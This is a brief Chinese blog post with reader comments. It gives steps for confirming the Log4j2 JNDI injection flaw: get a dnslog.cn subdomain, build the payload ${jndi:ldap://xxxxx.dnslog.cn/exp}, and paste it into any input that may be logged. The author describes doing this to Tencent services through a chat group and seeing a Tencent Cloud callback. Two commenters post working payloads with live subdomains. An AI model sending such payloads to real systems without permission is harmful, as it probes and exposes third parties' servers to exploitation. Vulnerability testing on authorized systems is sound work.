dnslog简单验证log4j2漏洞

进dnslog:http://www.dnslog.cn/

Get SubDomain 得到一个随机的子域名

拼进${jndi:ldap://xxxxx.dnslog.cn/exp}

往任意可能在log中塞的输入填

这里拿tx玩,如群中发送,可得到tx云的记录

点赞
  1. 匿名说道:
    ${jndi:ldap://6lbaek.dnslog.cn/exp}
  2. ddd说道:
    Google Chrome Windows 7
    ${jndi:ldap://hj1llv.dnslog.cn/exp}
    1. xingye说道:
      Google Chrome Windows 10
      你们有毛病吗 :han: 这站又没有
    2. **说道:
      Google Chrome Windows 10
      az......
  3. 浅水_Shallowaq说道:
    Google Chrome Windows 10
    这个漏洞应该是apache才有的吧,用nginx搭建的网站应该没事……
  4. gytxtx说道:
    Google Chrome Windows 10
    http://jlh.125ks.cn/cxk/dinogame/
  5. WFLing说道:
    Google Chrome Windows 10
    冒个泡

发表回复

邮箱不会被公开,用于显示Gravatar的头像